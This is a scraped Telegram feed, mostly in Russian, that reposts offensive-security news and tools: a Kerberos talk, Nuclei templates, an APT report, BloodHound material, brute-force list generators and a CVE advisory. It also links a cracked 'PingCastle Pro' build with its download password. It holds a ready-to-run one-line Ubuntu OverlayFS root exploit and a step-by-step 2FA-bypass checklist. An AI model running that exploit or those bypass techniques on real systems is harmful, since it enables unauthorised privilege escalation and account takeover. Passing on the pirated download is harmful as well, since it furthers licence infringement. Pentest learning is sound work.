Forwarded from sdnv's funk-hole
Media is too big
VIEW IN TELEGRAM
Доклад в УрФУ на тему Kerberos от Миши из RedTeam Brazzers.
Были разобраны некоторые базовые атаки, принцип работы и самые популярные механизмы, которые встречаются при каждом внутреннем пентесте.
Были разобраны некоторые базовые атаки, принцип работы и самые популярные механизмы, которые встречаются при каждом внутреннем пентесте.
👍1
Forwarded from Pwn3rzs
PingCastle Pro (No Server Side) 3.1.0.1
Note : Will provide only report with full Features such as Maturity Level, Mitre etc.
For server Side component we need someone with real license to download the installer from customer zone
Down : https://mir.cr/0JECBXGW
Passw : 20231109_1912
Note : Will provide only report with full Features such as Maturity Level, Mitre etc.
For server Side component we need someone with real license to download the installer from customer zone
#pentest #web
Nuclei + Wordfence =💗
Этот проект предоставляет обширную актуальную коллекцию шаблонов Nuclei, которые могут быть использованы для сканирования на наличие уязвимостей в WordPress. Шаблоны основаны на отчетах об уязвимостях Wordfence.com.
Больше 9.000 шаблонов на поиск уязвимостей в WP - шикарно!
💻 Github
Nuclei + Wordfence =
Этот проект предоставляет обширную актуальную коллекцию шаблонов Nuclei, которые могут быть использованы для сканирования на наличие уязвимостей в WordPress. Шаблоны основаны на отчетах об уязвимостях Wordfence.com.
Больше 9.000 шаблонов на поиск уязвимостей в WP - шикарно!
💻 Github
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - topscoder/nuclei-wordfence-cve: 60k+ WordPress Nuclei templates, updated daily from Wordfence intel—filter by severity/tags/CVE…
60k+ WordPress Nuclei templates, updated daily from Wordfence intel—filter by severity/tags/CVE and scan in one line. 🚀🔒 - topscoder/nuclei-wordfence-cve
Forwarded from RedTeam brazzers (Pavel Shlundin)
Как и в том году мой бывший коллега со своей командой CTI создали новый огромный отчёт. На этот раз про азиатским APT группировки!
Отчёт содержит 370 страниц подробного анализа о различных азиатских APT группировок с описанием TTPs, анализом действий атакующих на основе "Unified Kill Chain" и много других крутых штук, отчёт доступен для скачивания в RU и EN вариантах.
P.S. Данный материал на 14:00 по мск эксклюзив.
Отчёт содержит 370 страниц подробного анализа о различных азиатских APT группировок с описанием TTPs, анализом действий атакующих на основе "Unified Kill Chain" и много других крутых штук, отчёт доступен для скачивания в RU и EN вариантах.
P.S. Данный материал на 14:00 по мск эксклюзив.
🔥1
Forwarded from RedTeam brazzers (Pavel Shlundin)
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
⚛️ Nuclei AI — Browser Extension
Nuclei AI Browser Extension, built on top of cloud.projectdiscovery.io, simplifies the creation of vulnerability templates, by enabling users to extract vulnerability information from any webpages to quickly and efficiently create nuclei templates, saving valuable time and effort.
🚀 Features
— Context Menu Option to Generate Template
— HackerOne Report to Nuclei Template Generation
— ExploitDB exploit to Nuclei Template Generation
— BugCrowd / Intigriti / Synack support (Coming soon)
🔗 https://github.com/projectdiscovery/nuclei-ai-extension
#nuclei #template #generator #chrome #extension
Nuclei AI Browser Extension, built on top of cloud.projectdiscovery.io, simplifies the creation of vulnerability templates, by enabling users to extract vulnerability information from any webpages to quickly and efficiently create nuclei templates, saving valuable time and effort.
🚀 Features
— Context Menu Option to Generate Template
— HackerOne Report to Nuclei Template Generation
— ExploitDB exploit to Nuclei Template Generation
— BugCrowd / Intigriti / Synack support (Coming soon)
🔗 https://github.com/projectdiscovery/nuclei-ai-extension
#nuclei #template #generator #chrome #extension
👻1
Forwarded from infosec
BloodHound Unleashed.pdf
3 MB
• Очень полезная презентация (руководство), которая содержит все необходимые ссылки и информацию по изучению BloodHound.
• BloodHound — это популярный инструмент, который используется для сбора и анализа данных во время проведения пентеста внутренней инфраструктуры на базе Active Directory (AD). Этот инструмент позволяет визуализировать некорректные настройки объектов #AD и строить цепочки атак. Основная особенность — это использование теории графов при анализе данных.
#Пентест #BloodHound
Please open Telegram to view this post
VIEW IN TELEGRAM
💅2
Forwarded from Proxy Bar
CVE-2023-32629 и CVE-2023-2640
Ubuntu Privilege Escalation
*
BASH одной строкой:
#ubuntu #lpe
Ubuntu Privilege Escalation
*
BASH одной строкой:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"#ubuntu #lpe
Forwarded from Волосатый бублик
#cve #openvpn
OpenVPN Access Server (cve-2023-46849, cve-2023-46850)
https://openvpn.net/security-advisory/access-server-security-update-cve-2023-46849-cve-2023-46850/
OpenVPN Access Server (cve-2023-46849, cve-2023-46850)
https://openvpn.net/security-advisory/access-server-security-update-cve-2023-46849-cve-2023-46850/
Forwarded from ФСП Санкт-Петербурга
#Лайфхак для программистов: если вы кодите с ChatGPT (а вы кодите, не обманывайте дядю), то могли заметить, что ИИ совсем обленился и не хочет сам фиксить код, возвращая вам лишь ту часть, которую нужно заменить. Чинится следующей командой, которую нужно добавить в промт:
С ней нейросеть сжалится над вами и вернет весь исправленный код, ведь вы сами не можете — у вас лапки пальцев нету...
>>> [@fspspb] <<<
– return full script (I don't have fingers)
С ней нейросеть сжалится над вами и вернет весь исправленный код, ведь вы сами не можете — у вас лапки пальцев нету...
>>> [@fspspb] <<<
🎃3❤1😁1
Forwarded from Offensive Xwitter
😈 [ Panagiotis Chartas @t3l3machus ]
For your #redteam enumeration and brute forcing needs, use babelstrike to transliterate and generate usernames from full names in various non-English languages (common issue from scraped employee data) 🌐 Currently, it covers Greek, Hindi, Spanish, French, Polish, and Hungarian:
🔗 https://github.com/t3l3machus/BabelStrike
Combine it with #psudohash, a password list generator that imitates password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers (leet), using char-case variations, adding a common padding before or after the main passphrase and more:
🔗 https://github.com/t3l3machus/psudohash
🐥 [ tweet ]
For your #redteam enumeration and brute forcing needs, use babelstrike to transliterate and generate usernames from full names in various non-English languages (common issue from scraped employee data) 🌐 Currently, it covers Greek, Hindi, Spanish, French, Polish, and Hungarian:
🔗 https://github.com/t3l3machus/BabelStrike
Combine it with #psudohash, a password list generator that imitates password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers (leet), using char-case variations, adding a common padding before or after the main passphrase and more:
🔗 https://github.com/t3l3machus/psudohash
🐥 [ tweet ]
🎃2🐳1👨💻1
Forwarded from Похек (Sergey Zybnev)
This media is not supported in your browser
VIEW IN TELEGRAM
#2FA #bypass
[+] Манипуляция ответом. Если в ответе
"success":false, измените на "success":true[+] Манипуляция кодом состояния. Если код состояния
4ХХ, попробуйте изменить его на 200 OK и посмотрите, обойдётся ли ограничение.[+] Утечка кода 2FA в ответе. Проверьте ответ на запрос, инициирующий 2FA, на предмет утечки кода.
[+] Анализ JS-файлов. Редко, но некоторые JS-файлы могут содержать информацию о коде 2FA.
[+] Повторное использование кода 2FA. Один и тот же код может быть использован повторно.
[+] Отсутствие защиты от перебора. Возможен перебор любой длины кода 2FA.
[+] Отсутствие проверки целостности кода 2FA. Код для любой учётной записи может быть использован для обхода 2FA.
[+] CSRF на отключении 2FA. Нет защиты от CSRF на отключении 2FA, также нет подтверждения аутентификации.
[+] Сброс пароля отключает 2FA. 2FA отключается при смене пароля/почты.
[+] Злоупотребление резервным кодом. Обход 2FA с помощью злоупотребления функцией резервного кода.
[+] Кликджекинг на странице отключения 2FA. Отображение страницы отключения 2FA во фрейме и социальная инженерия для отключения 2FA жертвой.
Отображение страницы отключения 2FA во фрейме и социальная инженерия для отключения 2FA жертвой, если сессия уже перехвачена и есть уязвимость таймаута сессии.
[+] Обход 2FA с помощью null или 000000. Ввод кода
000000 или null для обхода защиты 2FA.[+] Обход Google Authenticator. Установка Google Authenticator для 2FA → включение 2FA → переход на страницу сброса пароля и смена пароля → если происходит редирект в личный кабинет, значит обойден 2FA (Google Authenticator).
[+] Обход OTP при регистрации путём многократной отсылки формы с использованием Repeater. Создание аккаунта с несуществующим номером → Перехват запроса в Burp → Отсылка в Repeater и пересылка → Смена номера на существующий в Repeater → Если пришёл OTP на телефон, использовать его для регистрации несуществующего номера.
Please open Telegram to view this post
VIEW IN TELEGRAM
😈1
Forwarded from CyberSecurityTechnologies (-CST-)
pentest_azure_ad.png
1.2 MB
Forwarded from Пост Лукацкого
NIST выпустил руководство по Phish Scale, методу даже не обучению борьбе с фишингом, а тому, как оценивать сложность/способность человека самостоятельно обнаруживать фишинг без участия технических средств.
Да, руководство можно использовать и при обучении и повышении осведомленности. Там много полезных данных. Например, там приведен список индикаторов, на которые стоит обращать внимание:
1️⃣ Ошибки
2️⃣ Технические индикаторы (тип вложения, URL, подмена домена...)
3️⃣ Визуальные индикаторы (отсутствие бренда или лого, имитация логотипа, индикаторы безопасности...)
4️⃣ Язык и контент (запрос чувствительной информации, срочность, угрозы...)
5️⃣ Общие тактики (бесплатный сыр, ограниченное по времени предложение...).
Да, руководство можно использовать и при обучении и повышении осведомленности. Там много полезных данных. Например, там приведен список индикаторов, на которые стоит обращать внимание:
Please open Telegram to view this post
VIEW IN TELEGRAM